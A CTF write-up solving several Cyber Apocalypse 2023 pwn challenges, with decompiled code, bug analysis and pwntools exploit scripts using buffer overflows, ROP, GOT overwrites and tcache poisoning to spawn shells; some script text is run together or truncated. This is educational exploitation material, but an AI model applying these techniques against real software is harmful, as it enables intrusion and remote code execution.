For the past five days, I have been competing solo in the Cyber Apocalypse CTF 2023. During this time, I was able to solve all of the pwn challenges and 10 out of the 11 crypto challenges. In this writeup, I will be sharing my solutions for some of the pwn challenges that I solved. If you’re interested in reading about the crypto challenges, check out my other post.
You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.
Initial Analysis
In this challenge, we were given a binary called labyrinth. Let’s start by analyzing the binary’s security measures using the checksec tool.
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
The binary has full RELRO, which means that the Global Offset Table (GOT) is read-only and cannot be modified. This prevents attackers from overwriting function pointers in the GOT to redirect program execution flow.
There is no canary present, which means that there is no stack protection mechanism in place to detect stack-based buffer overflows.
NX (No-eXecute) is enabled, which means that the stack and heap are marked as non-executable, preventing attackers from executing shellcode in these areas.
The binary is not compiled with Position Independent Executable (PIE) enabled, which means that the binary address is constant and not randomized during runtime.
Now, let’s disassemble the binary and take a closer look.
int__cdeclmain(intargc,constchar**argv,constchar**envp){charv4[8];// [rsp+0h] [rbp-30h] BYREF
__int64v5;// [rsp+8h] [rbp-28h]
__int64v6;// [rsp+10h] [rbp-20h]
__int64v7;// [rsp+18h] [rbp-18h]
char*s;// [rsp+20h] [rbp-10h]
unsigned__int64i;// [rsp+28h] [rbp-8h]
setup(argc,argv,envp);banner();*(_QWORD*)v4=0LL;v5=0LL;v6=0LL;v7=0LL;fwrite("\nSelect door: \n\n",1uLL,0x10uLL,_bss_start);for(i=1LL;i<=0x64;++i){if(i>9){if(i>0x63)fprintf(_bss_start,"Door: %d ",i);elsefprintf(_bss_start,"Door: 0%d ",i);}else{fprintf(_bss_start,"Door: 00%d ",i);}if(!(i%0xA)&&i)putchar(10);}fwrite("\n>> ",1uLL,4uLL,_bss_start);s=(char*)malloc(0x10uLL);fgets(s,5,stdin);if(!strncmp(s,"69",2uLL)||!strncmp(s,"069",3uLL)){fwrite("\n""You are heading to open the door but you suddenly see something on the wall:\n""\n""\"Fly like a bird and be free!\"\n""\n""Would you like to change the door you chose?\n""\n"">> ",1uLL,0xA0uLL,_bss_start);fgets(v4,68,stdin);}fprintf(_bss_start,"\n%s[-] YOU FAILED TO ESCAPE!\n\n","\x1B[1;31m");return0;}
Above is the main function. If you take a closer look, you’ll notice a buffer overflow vulnerability in the v4 variable when fgets(v4, 68, stdin); is called. Additionally, while disassembling the binary, I came across a useful function called escape_plan.
intescape_plan(){charbuf;// [rsp+Bh] [rbp-5h] BYREF
intfd;// [rsp+Ch] [rbp-4h]
putchar(10);fwrite(&unk_402018,1uLL,0x1F0uLL,_bss_start);fprintf(_bss_start,"\n%sCongratulations on escaping! Here is a sacred spell to help you continue your journey: %s\n","\x1B[1;32m","\x1B[0m");fd=open("./flag.txt",0);if(fd<0){perror("\nError opening flag.txt, please contact an Administrator.\n\n");exit(1);}while(read(fd,&buf,1uLL)>0)fputc(buf,_bss_start);returnclose(fd);}
The given code snippet shows that the escape_plan method will print the flag. Therefore, our objective is to manipulate the program’s execution flow in such a way that it calls the escape_plan method.
This is a classic buffer overflow challenge. As we can see in the decompiled main function, the buffer v4 position is in rbp-30h. Therefore, we need to send a payload that contains:
b'a'*0x30 (to fill the stack)
p64(exe.bss()+0x200) (to overwrite the saved RBP with a valid address in the .bss section)
p64(escape_plan_addr) (to overwrite the stored RIP with the escape_plan function address)
'''defconn():ifargs.LOCAL:r=process([exe.path])ifargs.PLT_DEBUG:# gdb.attach(r, gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrr=conn()# I choose to jump not to the start of escape_plan, but directly to the line that open and print the flag.win_addr=0x00000000004012b0r.sendline(b'69')payload=b'a'*0x30+p64(exe.bss()+0x200)+p64(win_addr)r.sendline(payload)r.interactive()
Flag: HTB{3sc4p3_fr0m_4b0v3}
Pandora’s Box
You stumbled upon one of Pandora’s mythical boxes. Would you be curious enough to open it and see what’s inside, or would you opt to give it to your team for analysis?
Initial Analysis
We were given a binary called pb. Let’s start by analyzing the binary’s security measures using the checksec tool.
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
The binary has the following security features:
Full RELRO, preventing overwriting the GOT.
No canary, indicating a lack of stack protection.
NX enabled, preventing jumping to the stack due to its non-executable property.
No PIE, which means the binary address is constant.
size_tbox(){__int64v0;// rdx
__int64v1;// rcx
chars[8];// [rsp+0h] [rbp-30h] BYREF
__int64v4;// [rsp+8h] [rbp-28h]
__int64v5;// [rsp+10h] [rbp-20h]
__int64v6;// [rsp+18h] [rbp-18h]
__int64num;// [rsp+28h] [rbp-8h]
*(_QWORD*)s=0LL;v4=0LL;v5=0LL;v6=0LL;fwrite("This is one of Pandora's mythical boxes!\n""\n""Will you open it or Return it to the Library for analysis?\n""\n""1. Open.\n""2. Return.\n""\n"">> ",1uLL,0x7EuLL,_bss_start);num=read_num("This is one of Pandora's mythical boxes!\n""\n""Will you open it or Return it to the Library for analysis?\n""\n""1. Open.\n""2. Return.\n""\n"">> ",1LL,v0,v1);if(num!=2){fprintf(_bss_start,"%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n","\x1B[1;31m");exit(1312);}fwrite("\nInsert location of the library: ",1uLL,0x21uLL,_bss_start);fgets(s,256,stdin);returnfwrite("\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n",1uLL,0x4BuLL,_bss_start);}
The same buffer overflow vulnerability can be observed in this challenge as well, specifically in the line fgets(s, 256, stdin). However, unlike the previous challenge, there doesn’t seem to be any concealed function that can print the flag.
The solution for this challenge involves ROP (Return Oriented Programming). Typically, there are two steps required to achieve code execution for this type of challenge:
Leaking a libc address
Forging the code execution flow to obtain a shell.
Since the binary is not PIE, we do not need to leak a PIE address and can directly use the available PLT provided in the binary. Additionally, we can use some available gadgets to perform the classic ROP.
Full Script
Here’s my full script that uses ROP (Return Oriented Programming) to solve this challenge:
As you have noticed, there is another buffer overflow vulnerability in the vuln function. However, the binary seems to be very small. Let’s take a look at the available Global Offset Table (GOT) using gdb.
Okay, so the GOT only contains read function. Therefore, there isn’t any method like puts that we can use to leak a libc address to gain a shell. Given the limitations of this small binary, it is clear that we need to find another way to get a shell.
With the aid of ropr, let’s identify the available gadgets in the binary.
ropr void -m 10
0x00401108: add [rbp-0x3d], ebx; nop [rax+rax]; ret;
0x004011b2: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
Notice that the first gadget is called add-what-where, which is a useful gadget. If we’re able to set the contents of rbp-0x3d and ebx, we can write to any memory location by incrementing the value with ebx. With the second gadget, we can set the rbp and rbx values.
BSince the binary is No PIE, we can rewrite the read GOT entry with any libc function address that we want without needing a leak. We just need to calculate the difference between our target libc function address and the read address. What should we overwrite the read GOT with?
The answer is we can rewrite it with the address of one_gadget. Let’s check the one_gadget result on the given libc.
Notice that the first one_gadget can be used because we have the gadget to set the r12 and r13 values as well. To summarize the steps needed to exploit this binary:
Exploit the buffer overflow vulnerability to redirect the execution flow and overwrite the read GOT entry with the address of one_gadget
Call read again, which will trigger the one_gadget and spawn a shell.
It turns out that this binary has five menus, and the fourth menu can be used to generate a new kana that is printed each time the binary displays a menu. I spent a lot of time on this challenge trying to find the bug, but it turns out that the first, second, and third menus are actually just a distraction.
The bug is in the sub_7642 (print menu) function itself, particularly when reading the user’s chosen option. Below is the disassembly of the sub_7642 function.
The read function is reading our input one character at a time, and it will stop only if the input character is \n. Each time it reads a byte, it will increment the v12 counter, which is stored in the stack. However, the size of s is only 6, which means this is a buffer overflow bug. With this vulnerability, we need to try to get a shell.
The issue with the binary is that it’s PIE-enabled, which means that without a leak of either the PIE base or libc, it’s not possible to use the buffer overflow bug to gain a shell. Normally, we’d need to overwrite the saved RIP, but we don’t know what address to write to because we don’t know the base address.
However, the setup of this challenge is unique. The v12 variable, which is the counter used as the offset of the current read, is located below the s position in the stack. This means that the buffer overflow can also overwrite v12 with a large value, allowing us to skip some bytes and jump directly to the desired location. Using this bug, we can perform the buffer overflow without overwriting the saved RIP in the stack. The question now is whether there’s a good target in the stack that resides below the saved RIP.
Fortunately, there is a suitable target in the stack below the saved RIP that we can use to leak a value. While debugging with gdb, I noticed that using the fourth menu to generate a new kana (a string that is always printed when the menu is printed) performs the following steps:
At this point, I realized that we could leverage this behavior to obtain a leak by overwriting the stack location containing our kana address with the address of our target. Using the buffer overflow bug, we could first attempt to leak the heap address.
Leaking heap address
With the buffer overflow bug, we can overwrite the last byte of the kana address to null. As we can see from the examination via GDB below, if we overwrite the last byte of kana with null, we will be able to get a leak of the heap address.
'''defconn():ifargs.LOCAL:r=process([exe.path])ifargs.PLT_DEBUG:# gdb.attach(r, gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrr=conn()r.sendlineafter(b'>> ',b'4')r.sendlineafter(b'>> ',b'b'*0x20)# Leak heap# The a*'0x5c' and '\xaf' is a crafted payload that we can use# to skip the option read by 0xaf bytes, so that we can leap over# the saved RIP during triggering the buffer overflow bug.## Basically, withh the BOF, we overwrite the v12 value to 0xaf, so that the next# write after overwriting the v12 will skip some addressed and jump directly to aaddress# below the saved RIP address.r.sendlineafter(b'>> ',b'a'*0x5c+b'\xaf'*1+b'c'*0x10)r.recvuntil(b' : ')out=r.recvline()leaked_heap=u64(out[8:16])'leaked_heap = {hex(leaked_heap)}')good_heap_offset=-0x23e8# Contains stack'target_heap = {hex(target_heap)}')
Leaking stack address
After observing via GDB, I noticed that the address leaked_heap - 0x23e8 contains a stack address.
By overwriting the stack address that contains kana to this heap chunk address, we can obtain a leak of the stack. Here’s a partial script that demonstrates this technique:
Once we obtained the leaked stack address, it became straightforward to get the PIE and libc addresses. There were many stack addresses that contained the information we needed. During debugging with gdb, I noticed that the address leaked_stack+0xb0 held a libc address, and the address leaked_stack-0x20 contained a PIE address. To retrieve the leaks, we repeated the previous step of overwriting the stack address with the corresponding good addresses.
With the leak of libc, pie, and stack addresses, we can now proceed with classic ROP exploitation. I opted to use the one_gadget to obtain a shell. In the partial script below, I first constructed the ROP chain by finding gadgets in the binary that fulfill the one_gadget constraint. Once the chain is built, we simply need to return to the one_gadget to trigger it and obtain a shell.
# ROP to'Try to ROP...')pop_rsi_rbp=pie_base+0x000000000000605fpop_rdx=pie_base+0x0000000000006022one_gadget=libc.address+0xebcf8# rbp-0x48 writable, rbp-0x50 null, r12 nullrbp=leaked_stackpayload=b'a'*0x6bpayload+=p64(rbp)payload+=p64(pop_rsi_rbp)+p64(0)+p64(rbp)payload+=p64(pop_rdx)+p64(0)payload+=p64(one_gadget)r.sendlineafter(b'>> ',payload)r.interactive()
After unearthing the crashed alien spacecraft you have hacked your way into it’s interior. Nothing seems perticularily interesting until you find the spacecraft’s control room. Filled with monitors, buttons and panels this room surely contains a lot of important information, including the coordinates of the underground alien vessels that you ’ve been looking for. You decide to start off by booting up the main computer. You hear an uncanny buzzing-like noise and then a monitor lights up requesting you to enter a username. Can you take control of the Control Room?
Initial Analysis
We were given a binary file. Let’s try to checksec it first
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
The binary has the following security features:
Partial RELRO, indicating that we can overwrite the GOT.
Canary found, indicating a canary is exist to protect the stack.
NX enabled, preventing jumping to the stack due to its non-executable property.
No PIE, which means the binary address is constant.
Let’s disassemble the binary and see what we can find.
We can see that there is a global variable named curr_user which is a pointer to a chunk with size 0x110. In addition, the function sets the value at curr_user+0x100 to 2.
Reading through the code, it just reads the username input, stores it in curr_user, and then stores the length as well in the curr_user struct. Let’s move to the user_edit function.
voiduser_edit(){intn;// [rsp+4h] [rbp-Ch]
void*s;// [rsp+8h] [rbp-8h]
puts("<===[ Edit Username ]===>\n");printf("New username size: ");n=read_num();getchar();if(*((_QWORD*)curr_user+33)>=(unsigned__int64)n){s=malloc(n+1);if(!s){log_message(3LL,"Please replace the memory catridge.");exit(-1);}memset(s,0,n+1);printf("\nEnter your new username: ");fgets((char*)s,n,stdin);*((_BYTE*)s+strcspn((constchar*)s,"\n"))=0;strncpy(curr_user,(constchar*)s,n+1);log_message(0LL,"User updated successfully!\n");free(s);}else{log_message(3LL,"Can't be larger than the current username.\n");}}
There is an off-by-one bug in this code. If the length of our username is 256, which means the max value of n is also 256, a call to memset(s, 0, n+1) will set 257 bytes to null. The size of the username is 0x100, which means that this memset is overwriting one byte next to the curr_user username with a null byte. The curr_user+0x100 value is set during the setup and we do not know its value yet, so let’s move on to disassembling the next function.
__int64print_current_role(){intv0;// eax
v0=*((_DWORD*)curr_user+64);if(v0==2)returnlog_message(1LL,"Current Role: Crew\n");if(v0>2)gotoLABEL_9;if(!v0)returnlog_message(1LL,"Current Role: Captain\n");if(v0!=1){LABEL_9:log_message(3LL,"How did you get here?!\n");exit(1337);}returnlog_message(1LL,"Current Role: Technician\n");}
We have discovered that the curr_user+0x100 value represents the user’s role, with three possible options: crew (2), captain (0), and technician (1), as specified in the print_current_role function. The off-by-one bug in the user_edit function allows us to overwrite this value with null bytes if the username is exactly 256 bytes long. Therefore, we can set our role to captain by crafting a username of length 256.
Now, let’s try to disassemble each menu that is available.
unsigned__int64configure_engine(){_QWORD*v0;// rcx
__int64v1;// rdx
intnum;// [rsp+Ch] [rbp-24h]
__int64v4;// [rsp+10h] [rbp-20h] BYREF
__int64v5;// [rsp+18h] [rbp-18h] BYREF
chars[2];// [rsp+25h] [rbp-Bh] BYREF
charv7;// [rsp+27h] [rbp-9h]
unsigned__int64v8;// [rsp+28h] [rbp-8h]
v8=__readfsqword(0x28u);*(_WORD*)s=0;v7=0;if(*((_DWORD*)curr_user+64)==1){printf("\nEngine number [0-%d]: ",3LL);num=read_num();if(num<=3){printf("Engine [%d]: \n",(unsignedint)num);printf("\tThrust: ");__isoc99_scanf("%ld",&v4);printf("\tMixture ratio: ");__isoc99_scanf("%ld",&v5);}getchar();printf("\nDo you want to save the configuration? (y/n) ");printf("\n> ");fgets(s,3,stdin);s[strcspn(s,"\n")]=0;if(!strcmp(s,"y")){v0=(_QWORD*)((char*)&engines+16*num);v1=v5;*v0=v4;v0[1]=v1;log_message(0LL,"Engine configuration updated successfully!\n");}else{log_message(1LL,"Engine configuration cancelled.\n");}}else{log_message(3LL,"Only technicians are allowed to configure the engines");}return__readfsqword(0x28u)^v8;}
This menu can only be accessed if the role is technician. Notice that there is a bug where the num that stored the targeted index is a signed int. That means, we can put negative value, which will give us a OOB write for address before the engines.
The function check_engines isn’t useful enough, so I’ll skip it. Next function will be the change_route.
unsigned__int64change_route(){inti;// [rsp+Ch] [rbp-54h]
__int64v2[8];// [rsp+10h] [rbp-50h] BYREF
chars[2];// [rsp+55h] [rbp-Bh] BYREF
charv4;// [rsp+57h] [rbp-9h]
unsigned__int64v5;// [rsp+58h] [rbp-8h]
v5=__readfsqword(0x28u);*(_WORD*)s=0;v4=0;if(*((_DWORD*)curr_user+64)){log_message(3LL,"Only the captain is allowed to change the ship's route\n");}else{for(i=0;i<=3;++i){printf("<===[ Coordinates [%d] ]===>\n",(unsignedint)(i+1));printf("\tLatitude : ");__isoc99_scanf("%ld",&v2[2*i]);printf("\tLongitude : ");__isoc99_scanf("%ld",&v2[2*i+1]);}getchar();printf("\nDo you want to save the route? (y/n) ");printf("\n> ");fgets(s,3,stdin);s[strcspn(s,"\n")]=0;if(!strcmp(s,"y")){route=v2[0];qword_405168=v2[1];qword_405170=v2[2];qword_405178=v2[3];qword_405180=v2[4];qword_405188=v2[5];qword_405190=v2[6];qword_405198=v2[7];log_message(0LL,"The route has been successfully updated!\n");}else{log_message(1LL,"Operation cancelled");}}return__readfsqword(0x28u)^v5;}
This menu option is restricted to users with the captain role. However, there are two bugs in this function. The first one is how it scan the value. If we put invalid number during the call of __isoc99_scanf("%ld", &v2[2 * i]); and __isoc99_scanf("%ld", &v2[2 * i + 1]); (For example, putting an alphabet cahracter), the scanf will skip and continue to the next LOCs. The second bug is that there isn’t any handling mechanism to handle if the scanf is failed, which means it will still copy the value stored in the stack to the route variable.
This kind of bug is called UDA (Uninitialied Data Access). If you read the code again, there isn’t any mechanism to clear out the stack data before using it. Combined with the fact that there isn’t failure handling if the scanf failed, that means it is possible for us to set the route value with the value from the stack. If we’re lucky enough, that might contains some sensitive data that shouldn’t be leaked (for example, a libc address).
Let’s check the view_route menu.
intview_route(){intresult;// eax
inti;// [rsp+Ch] [rbp-4h]
if(*((_DWORD*)curr_user+64))returnlog_message(3LL,"Only the captain is allowed to view the ship's route.\n");result=puts("<===[ Route ]===>");for(i=0;i<=3;++i)result=print_coordinates((unsignedint)i);returnresult;}
This method is just printing values stored in the route array. Let’s check the last menu called change_role
__int64change_role(){unsignedintnum;// [rsp+Ch] [rbp-4h]
if(*((_DWORD*)curr_user+64))returnlog_message(3LL,"Only Captain is allowed to change roles.\n");puts("<===[ Available roles ]===>");puts("Technician: 1 | Crew: 2");printf("New role: ");num=read_num();if(num>1)returnlog_message(3LL,"Invalid role.");*((_DWORD*)curr_user+64)=num;returnlog_message(0LL,"New role has been set successfully!");}
This menu can only be used by captain, where the captain is allowed to change its role.
Now that we have analyze the available functions, this is the summary of our findings:
There is a bug in user_edit, where if you put n with 256, it will actually nullify the byte resides in curr_user+0x100, which is role. Nullify mean setting it to 0, which mean the user itself will be converted to captain even before entering the menu method.
There is a bug in configure_engine, where you can use negative index to do OOB Write for addresses before the address of engine.
There is a bug as well in change_route, where you can trigger UDA and set it to the route entry. Combined with view_route, we can print the UDA value whichh has been copied to here.
Based on those three bugs, we need to figure out how to gain a shell.
Leaking libc address
To gain a shell, we need to get a leak of the libc address. Based on the above bugs, the only possible path to get a libc leak is by trigering the UDA bug, with hope that the UDA is a libc address. After trying this method, turn out we’re lucky enough because the UDA value is indeed a libc address. Below is the proof
As you can see, the first coordinate longitude is indeed a libc address if you convert it to hex.
Gain Remote Code Execution
Now that we have the libc leak, we can switch our role to technician, and then trigger a OOB write with negative index. Our target is to overwrite the atoi GOT to system. After that, we can simply input sh during the read_option call in menu, and because the read option is using atoi, it will trigger system("sh"), which will give us a shell.
'''defconn():ifargs.LOCAL:r=process([exe.path])ifargs.PLT_DEBUG:# gdb.attach(r, gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrr=conn()defconfigure_engine(idx,v1=0,v2=0,is_printf=False):r.sendline(b'1')# configure Enginer.sendline(str(idx).encode())ifnotis_printf:r.sendline(str(v1).encode())r.sendline(str(v2).encode())else:r.sendline()# r.interactive()r.recvuntil(f'[{idx}]:'.encode())r.recvuntil(b': ')thrust=int(r.recvuntil(b'\t').strip())r.recvuntil(b': ')mixture=int(r.recvline().strip())r.sendline(b'n')returnthrust,mixturer.sendline(b'y')# Trigger the off-by-one bugr.send(b'a'*0x100)r.sendline(b'n')r.send(b'256')r.send(b'a'*0x100)# Leak stack UDA, which contains libc addressr.sendline(b'3')r.sendline(b'ay')r.sendline(b'4')r.recvuntil(b'Latitude : ')r.recvuntil(b'Latitude : ')r.recvuntil(b'Latitude : ')r.recvuntil(b'Latitude : ')r.recvuntil(b'Latitude : ')r.recvuntil(b'Longitude : ')leaked_libc=int(r.recvline().strip())libc.address=leaked_libc-(libc.symbols.atoi+20)'libc base = {hex(libc.address)}')# Change role to technicianr.sendline(b'5')r.sendline(b'1')engines_addr=0x405120# Change atoi to systemconfigure_engine((['atoi']-engines_addr)//0x10,libc.symbols.system,0x401150)r.sendline(b'sh')# Trigger a shellr.interactive()
Flag: HTB{pr3p4r3_4_1mp4ct~~!}
Math Door
Pandora is making her way through the ancient city, but she finds herself in a room with only locked doors. One of them looks majestic, and it has lots of hieroglyphs written on its surface. After inspecting it, she realizes it’s all math: the door presents a problem and she has to solve it to go through to the heart of the ancient city. Will you be able to help her?
Initial Analysis
For this challenge, we were given a binary called math-door and the used libc Checking the given libc, it used libc-2.31. Now, Let’s try to checksec it.
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Okay, so all protections are enabled. Let’s try to disassemble the binary to understand how the binary works.
int__cdecl__noreturnmain(intargc,constchar**argv,constchar**envp){intv3;// [rsp+Ch] [rbp-4h]
setup(argc,argv,envp);puts("You are facing the mathy door!\n""The door is blocked by a mysterious riddle that hasn't been solved since the ancient times...\n""It's said that it's beyond human comprehension. That only alien beings can understand such advanced concepts.\n""Can you math your way through?");while(1){while(1){puts("1. Create \n2. Delete \n3. Add value \nAction: ");v3=read_int();if(v3!=3)break;math();}if(v3>3){LABEL_10:puts("Invalid action!");}elseif(v3==1){create();}else{if(v3!=2)gotoLABEL_10;delete();}}}
Okay, so reading through the menu, there are three actions that we can do:
Add value
Let’s check the available menu one by one.
intcreate(){intv1;// ebx
if(counter>64)returnputs("Max amount of hieroglyphs reached.");v1=counter;chunks[v1]=malloc(0x18uLL);printf("Hieroglyph created with index %i.\n",(unsignedint)counter);return++counter;}
Okay, so we have global variable called counter to store the number of hieroglyphs that we can create. And there is a global variable called chunks, which is a pointer to a heap chunk with size 0x18. There isn’t any bug in here, so let’s move to the next menu
So, this menu will ask for the chunk index that we want to modify, and then ask the value that we want to add to the chunk. Notice that there is a bug in here:
Notice that there isn’t a check whether the chosen chunk has been freed or not. This means that there is a Use-After-Free (UAF) bug.
To summarize, the bugs that we have:
UAF, where we can modify the chunk with math function even though we have freed that chunk
Double Free, where we can free the chunk multiple times because there isn’t any check whether the target chunk has been freed or not.
Now that we have discovered the bugs in the binary, it’s time to think about how to exploit the bugs. The goal is to get a shell.
In order to get a shell, we typically need to obtain a libc address leak first. The most common method is to free a heap chunk to the unsorted bin and then attempt to read the value of the freed chunk to get the libc address since the freed chunk will contain a libc address to the main_arena.
However, there are certain limitations in this binary that we must overcome:
We can only call malloc(0x18) using the create function. This is a limitation because:
In order to free a heap chunk to the unsorted bin, we need to either:
Free a chunk with size larger than the limit of tcache (0x408), or
Fill the tcache bin with size larger than 0x80 (Max entries per bin is 7), so that the next free after the bin is full will go to unsorted bin.
If the size is <= 0x80, it will go to fastbin instead.
We couldn’t see the value of the hieroglyph (chunk) becaue there isn’t any menu to support that action.
So, even though we somehow can fill the chunk’s stored value with a libc address due to to the free to unsorted bin, we still couldn’t see the stored value.
So, we need to bypass this limitation one by one. Let’s try to think on how to bypass it and get a shell with top-down approach.
Thus, we must bypass these limitations one by one. Our ultimate goal is to spawn a shell. Because the used libc is libc-2.31, the __free_hook can still be used. So, our target is simple, overwrite the __free_hook with system, so that when we call free("/bin/sh"), it will do system("/bin/sh") instead.
To overwrite the __free_hook, the idea is we need to somehow allocate a chunk to that address, so that when we modify the value, the __free_hook value will be overwritten. To do that, we can leverage the UAF bug to do tcache poisoning, so that the freelist pointer will be forged to point to the __free_hook address. If we’re able to poison it, when we allocate a chunk, the chunk will reside in the same address with __free_hook.
Now, in order to do that, we need a way to print a libc address, so that we can have a leak and use that value to poison the tcache. However, as I stated before, let say that we’re able to free a chunk to unsorted bin, even though we have UAF, we couldn’t see the libc adress value on that freed chunk. What we can do is only modifying the value with UAF, not printing the value.
In this case, usually one of the tricks is to get a libc leak via stdout. You can read more about this on my other writeup, but the tl;dr is we can get a libc leak if we’re able to:
Overwrite _IO_2_1_stdout_->flags with 0x1800
Overwrite _IO_2_1_stdout_->_IO_write_ptr to be larger than _IO_2_1_stdout_->_IO_write_base.
An idea that I have to modify the _IO_2_1_stdout_ fields is somehow, we need to somehow able to allocate a hieroglyph chunk to the _IO_2_1_stdout_ so that we can modify its value with the math function.
To do that, my idea is to do tcache poisoning to forge the freelist pointer to point to the _IO_2_1_stdout_, so that when we call create (which trigger malloc(0x18)), the chunk will be allocated to the stdout struct due to the poisoned freelist.
And to do that tcache poisoning, we need to somehow overwrite the tcache freelist pointer with the stdout libc address. But then again, we don’t know the libc address yet, so we can’t simply trigger the UAF to poisoned the tcache.
An idea that came to my mind is we need to leverage the double free bug that we have. The main idea is, we need to free a chunk twice, so that:
The first free will make the chunk went to tcache
The second free will make the chunk went to unsorted bin
Notes that tcache has higher priority than unsorted bin during malloc, which mean if the chunk resides in both tcache and unsorted bin, the allocation logic will consider the chunk as a tcache entry rather than an unsorted bin chunk.
So, if we’re somehow able to do that, that basically the same as what we’re trying to do, poisoned a tcache freelist pointer to point to a libc area. And once it has pointed to a libc area, we can use the UAF bug to increase/decrease the pointer value with math function, so that we can point it to the _IO_2_1_stdout_. Once we do that, we will be able to leak the libc address.
So that we’ve already settled the plan, let’s reverse our thought process from top-down to bottom-up. So, the big plan is:
Double free a chunk so that it resides in tcache and unsorted bin.
Increase/Decrease the pointer with the UAF bug, so that it points to the stdout.
Call malloc(0x18), so that we have a hieroglyph reside on that stdout.
Modify the flags and _IO_write_ptr to get a libc leak.
Do tcache poisoning again to allocate a chunk to the __free_hook
Overwrite it with system
Get a shell
Let’s do that :)
Create a freed chunk which resides in tcache and unsorted bin
The first step is to have a freed chunk which resides in both tcache and unsorted bin, which means we need to somehow free our chunk to the unsorted bin. Because we can only create a chunk with size 0x18, that means we need to somehow able to create or forge a fake chunk with size larger than that. Because the chunk size is 0x18, that means that when it’s being freed, it will go to the tcache bin.
Remember that we have UAF bug in the math function, where we can modify the chunk value (by adding the stored value to our input value) even though it has been freed. We can use this bug to do tcache poisoning, where we modify the tcache pointer so that it points to our targeted address. I’ll give the illustration later.
With the UAF bug, my target is to somehow poison the tcache so that I have a chunk that points to the other chunk. Let’s prepare our script first by creating helpers.
Now, our target is to create an overlapping chunk with hope that one of the chunk points to the other chunk’s metadata. Let’s start by creating three chunks and freed the first two chunks.
# Create three chunks (0, 1, 2)for_inrange(3):create()# Free the first two chunksdelete(0)# Delete chunks[0]delete(1)# Delete chunks[1]
Let’s check on the gdb to check the tcache bin states and the heap layout:
As you can see, after we freed the first two chunks, the second chunk now contains a pointer to the first chunk. This means that if we try to call malloc(0x18) for two times, the first allocation will reuse the second chunk allocation (Because it is the HEAD of the linked list just like what is shown in the above bins linked list).
Now, remember that we have a UAF bug, where we can modify the chunk stored value even though it has been freed, and our goal is to create a chunk that points to the other chunk’s metadata. With the UAF bug, we actually can increase the stored value of the second chunk by 0x10. Let’s try to do that
# Poison the tcache so that the freed linked list points# to the chunks[1] metadata.inc_val(1,p64(0x10))
As you can see, now, we successfully poisoned the tcache linked list, so that it points to a chunk metadata. Now, if we try to create two new hieroglyph, the last created hieroglyph will be located in the address 0x55555555c2b0, which is the chunk 0x55555555c2c0 metadata.
create()# Create chunks[3]. Because it uses tcache, so basically chunks[3] and chunks[1] are overlapping (pointing to the same heap chunk).create()# Create chunks[4]. Now, it points to chunks[1] and chunks[3] metadata.inc_val(4,p64(0)+p64(0x21))# Fix the chunks[3] metadata size to 0x21 because the metadata got nullified due to the creation before.# Now, we have a chunk (chunks[4]) which points to other chunks metadata (chunks[1] and chunks[3]).# We will use it later as we want to setup for other things first
After execute the above script, we will have two extra chunks, (chunks[3] and chunks[4]). chunks[3] will store the same heap chunk’s address as chunks[1], because it uses tcache during the allocation and chunks[1] stored heap chunk’s address is the first entry in the tcache[0x20] free list. And because we poison the tcache freelist, after the first allocation, the second allocation will go to the poisoned value, which is the chunks[1] (or chunks[3]) metadata.
Now that we have proved that we can poisoned the tcache to any address that we want (in this case to another chunk’s metadata), we can do anything that we want as well. We will back to this chunks later because we need to do one more thing before forgin chunks metadata.
Remember that our goal in this step is to free a chunk twice, so that it resides on tcache and unsorted bin. I’ve mentioned before that there are two ways to allocate a chunk to the unsorted bin. For this chall, I decided to use the the second approach, where we make tcache bin with size larger than 0x80 to be full, so that the next freed chunk will reside in unsorted bin. What is the easiest way to make the bin full? In my view, the easiest way is to directly edit the tcache bins data structure, because I’m too lazy to call free 7 times.
To give you brief explanation, the tcache bins data structure is actually stored in the heap as well. It is called tcache_perthread_struct. The definition is like below (libc-2.31):
counts are array that storing the total of freed chunk with n size that resides in tcache. For example, if you have two freed chunk with size 0xa0, then the counts[(chunk_size-MIN_CHUNK_SIZE) // 16] stored value will be 2 (MIN_CHUNK_SIZE = 0x20). Where is the address of this data structure? It always placed in the heap_base as the first allocated chunk during initializing a heap (You can check gdb if you want).
So, to fulfill the bin, I decided to do another tcache poisoning, so that I can allocate a chunk to the tcache_perthread_struct. Let’s continue our previous script:
As you can see, chunks[5] resides in 0x55555555c300, where the tcache pointer value is 0x000055555555c2e0. We want to poison it to point to tcache_perthread_struct.counts, which is in 0x000055555555c010 (heap_base+0x10). So, with the UAF, subtract it value with 0x2d0, and then we will be able to have a chunk resides in the tcache_perthread_struct.counts
inc_val(5,p64(0xffffffffffffffff-(0x2d0-1)))# Subtract the value of chunks[5] freelist pointer by 0x2d0# Now, the freelist pointer will point to the tcache_perthread_struct.countscreate()# Create chunks[7]create()# Create chunks[8]. Now, it points to tcache_perthread_struct.counts
Notice that the chunks[8] points to the same address as tcache_perthread_struct.counts, which mean, by modifying the value of chunks[8], we technically modify the tcache bins counts as well.
In this case, I want to free a chunk with size 0xa0 (it just my preference to use 0xa0 as the size, but you’re free to use other size) so that it goes to unsorted bin. That means, I need to set the counts[(0xa0-0x20) // 16] = counts[8] to 7.
inc_val(8,p64(0)+p64(0)+p64(0x7))# Set tcache_perthread_struct.counts[(0xa1-0x20-1) // 16] to 0x7
As you can see, we have successfully forged the tcachebins counts of 0xa0 to full. Now, if we free a chunk with size 0xa0, it will go to unsorted bin.
However, remember that the create function can only allocate a chunk with size 0x18. This is the time where we will use the chunks[4] that we have poisoned before. Remember that chunks[4] points to the metadata of chunks[1] and chunks[3]. By modifying the chunks[4] value, we can forge the size of chunks[1] and chunks[3] to any size that we want.
